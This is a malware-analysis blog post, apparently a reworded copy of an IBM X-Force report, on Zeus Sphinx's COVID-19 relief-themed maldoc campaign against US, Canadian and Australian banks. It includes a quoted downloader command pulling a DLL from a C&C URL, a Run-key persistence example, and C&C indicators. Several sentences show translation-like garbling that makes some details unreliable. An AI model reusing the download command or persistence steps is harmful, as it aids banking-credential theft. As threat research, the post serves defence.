The past few months have created a new reality around the world as the new coronavirus pandemic has spread from country to country, raising concerns around the world. With spammers and malware distributors already used to spreading new trends, the COVID-19 theme has been exploited to the full by a wide variety of spam and malspam campaigns. It seemed like the right time for Zeus Sphinx (AKA Zloader, Terdot) to join the crowd and resurface after nearly three years of absence.
While some Sphinx activity we detected leaked from December 2019, the volume of campaigns only increased in March 2020, probably due to a test period by Sphinx operators. It seems that taking advantage of the current climate, Sphinx operators are turning to those awaiting government relief payments. Current malspam campaigns include trapped document files called “COVID 19 relief” and subject lines based on the same theme. Sphinx’s goals have not changed from its old configuration files, as it continues to focus on banks in the United States, Canada and Australia.
While the renewed Zeus Sphinx activity that IBM X-Force sees includes a somewhat modified variant of this malware, Zeus Sphinx is not new malware and this variant is only slightly different from the original. We will therefore enter into some basic modifications that have been made to the variant that we observed, mainly affecting its delivery and deployment on newly infected devices, as well as its concentration on the current pandemic.
COVID-19 Maldoc Spam Delivery
Nowadays, almost all malware campaigns use malicious document files (maldocs) to reach the mailboxes of potential victims. The Sphinx campaigns we have observed are also disseminated via Maldoc spam that takes advantage of the COVID-19 trend theme. In the past three months, spammers around the world have used the pandemic to spread phishing, scams, and malware. In the case of Sphinx, the email indicates to victims that they must complete an attached form to receive monetary compensation for having to stay at home in order to combat the rising rates of infection.
Figure 1: Malspam delivering a Zeus Sphinx infection (Source: IBM X-Force)
From a variety of Office programs, the majority being .doc or .docx files, these documents first ask the end user to activate the execution of a macro, unknowingly triggering the first step of the chain of infection. Once the end user accepts and activates these malicious macros, the script starts its deployment, often using legitimate pirated Windows processes that retrieve a malware downloader. Then the downloader will communicate with a remote command and control (C&C) server and retrieve the appropriate malware – in this case, the new Sphinx variant.
The maldoc is password protected, which can prevent the file from being analyzed before the recipient opens it.
Figure 2: Maldoc file requires password to open (Source: IBM X-Force)
In the next step, the recipient is asked to activate the macros.
Figure 3: The maldoc file trapped by Booby asks the user to activate the macros (Source: IBM X-Force)
Once on the device, Sphinx establishes persistence via commonly used methods to maintain control of the end user machine. In this case, it writes many folders and files to disk and adds registry keys in order to hide and manage its configuration files over time.
Deployment method
The infection process of the new variant of Zeus Sphinx starts with the armed document which creates a malicious file under % SYSTEMDRIVE% and writes a batch file to it.
After running the batch file, it writes a VBS file to the same folder. This file is executed and uses a legitimate file WScript.exe , creates a communication channel with its C&C server and downloads a malicious executable as a DLL.
Figure 4: Sphinx scripts and unwanted text inserted in the file (Source: IBM X-Force)
The command line is similar in several cases. As written in the VBS content file, here is an example of the command:
“Nologo C: Logs Jobs.vbs http://brinchil.xyz/MLrPSC C: Logs kofet.dll“
The malicious DLL, which is the executable of Sphinx, is also written in the folder under % SYSTEMDRIVE%. The infection process is started with the execution of the Sphinx DLL using Regsvr32.exe, which triggers the Sphinx chain of infection.
At first, the malware creates a hollow process, msiexec.exe, and injects its code into it. This same step was used by older versions of Sphinx for deployment. It creates the first folder under % APPLICATION DATA% and creates an executable file there. Later, it will change the extension to .DLL for persistence purposes.
In addition, the malware adds more than 10 other malicious files containing various data files under % APPLICATION DATA%.
Figure 5: Sphinx files written in the APPDATA section (Source: IBM X-Force)
Next, the malware creates an execution key in the registry under HKCU Software Microsoft Windows CurrentVersion Run with the path to the DLL defined under % APPLICATION DATA% as a persistence method using Rundll32.exe and DllRegisterServer as an argument. This will execute the DLL using the Regsrv32.exe process.
For example:
- Key – HKCU Software Microsoft Windows CurrentVersion Run Uffuehh
- Value – rundll32.exe C: Users michel AppData Roaming Fecaa dagicoy.dll, DllRegisterServer
Figure 6: Zeus Sphinx execution key (Source: IBM X-Force)
The malware also creates two registry hives under HKCU Software Microsoft , each containing a key containing part of its configuration.
Please note that all file and resource names are dynamically generated for each infected machine and not hard-coded; therefore, what is shown in this blog are examples that will differ depending on each deployment.
Self-signed certificate
Sphinx signs malicious code with a digital certificate that validates it, making it easier to stay under the radar of common antivirus (AV) tools when injected into browser processes. In the following example, this file is named “Byfehi. ”
Figure 7: Sphinx self-signed certificate (Source: IBM X-Force)
Zeus Live Web Injections
Certain origins of Zeus Sphinx, inherited from its Zeus v2 code base, remain intact. There are several variants of Zeus that work similarly, by writing resources on the % APPLICATION DATA% folder and write the registry key in HKCU Software Microsoft.
To perform web injections, malware patches explorer.exe and browser process iexplorer.exe/chrome.exe/firefox.exe but does not have the actual ability to repeat itself again if this patch is fixed, making the problem less persistent and unlikely to survive version upgrades.
Sphinx also creates a mutex on the injected process in the form of GUID – [0-9A-F]{12} -[0-9A-F]{4} -[0-9A-F]{4} -[0-9A-F]{4} -[0-9A-F]{8}.
Configuring malware
The Sphinx variant we looked at creates two registry hives under HKCU Software Microsoft , each containing a key containing part of its configuration.
In the example below, we can see this as HKCU Software Microsoft Ehobb and HKCU Software Microsoft olyq.
Figure 8: Sphinx configuration file (Source: IBM X-Force)
Current objectives
Once loaded and retrieved from Sphinx’s process memory, it can be seen that Sphinx is back in targeting major banks in the United States and Canada. We are also witnessing an increase in infection rates in Australia targeting major banks in the region.
Recover from Tables – A Commercial Web Injection Panel
The currently active Zeus Sphinx variant communicates with its C&C server using a web control panel for web injections. This platform is known as “Tables”.
Figure 9: “Tables” web interface – user login page (Source: IBM X-Force)
The Web Tables injection system has been operational since 2014, adapted and mainly used by Zeus-type Trojans that target entities in North America and Europe.
This panel provides all the resources necessary for malware to infect and collect relevant information from the machines of infected victims. Once the connection to the Tables panel has been established, Sphinx retrieves additional JavaScript files for its Web injections in order to adapt them to the targeted bank on which the user is browsing. The injections are all configured on the same domain with specific JS scripts for each bank / target.
About Zeus Sphinx
Zeus Sphinx initially emerged as a commercial banking Trojan that started selling and spreading for the first time in August 2015, targeting major financial entities in the UK, expanding its reach over time to attack banks in Australia, Brazil and North America, attackers deploying Sphinx attacks remain focused on the banking industry in these countries, adapting its attacks to local financial systems.
As a modular banking Trojan based on the dated Zeus v2 code, Sphinx’s primary ability is to collect account credentials online from banks and a wide range of other websites. It calls its C&C server to retrieve relevant web injections when infected users land on a targeted page and uses them to modify the pages that users visit to include social engineering content and induce them to disclose personal information and codes authentication.
Want to keep up to date with the Sphinx and new threat information? Join us on the IBM X-Force Exchange and read our Security Intelligence research blogs.
Compromise indicators (IoCs)
Maldoc
DFF2E1A0B80C26D413E9D4F96031019CE4567607E0231A80D0EE0EB1FCF429FE
Samples
VBS example: 2FC871107D46FA5AA8095B78D5ABAB78
Sphinx samples:
C8DFF758FEB96878F578ADF66B654CD7
70E58943AC83F5D6467E5E173EC66B28
7CA44F6F8030DF33ADA36EB35649BE71
8A96E96113FB9DC47C286263289BD667
C6D279AC30D0A60D22C4981037580939
IPs
104.27.179.176
104.27.178.176
185.14.29.227
49.51.161.225
47,254,174,129
C&C Servers
C&C Downloader: hxxp: //brinchil.xyz
C and C Sphinx:
hxxps: // seobrooke[.com]
hxxps: // securitysystemswap[.com]
hxxps: // axelerode[.club]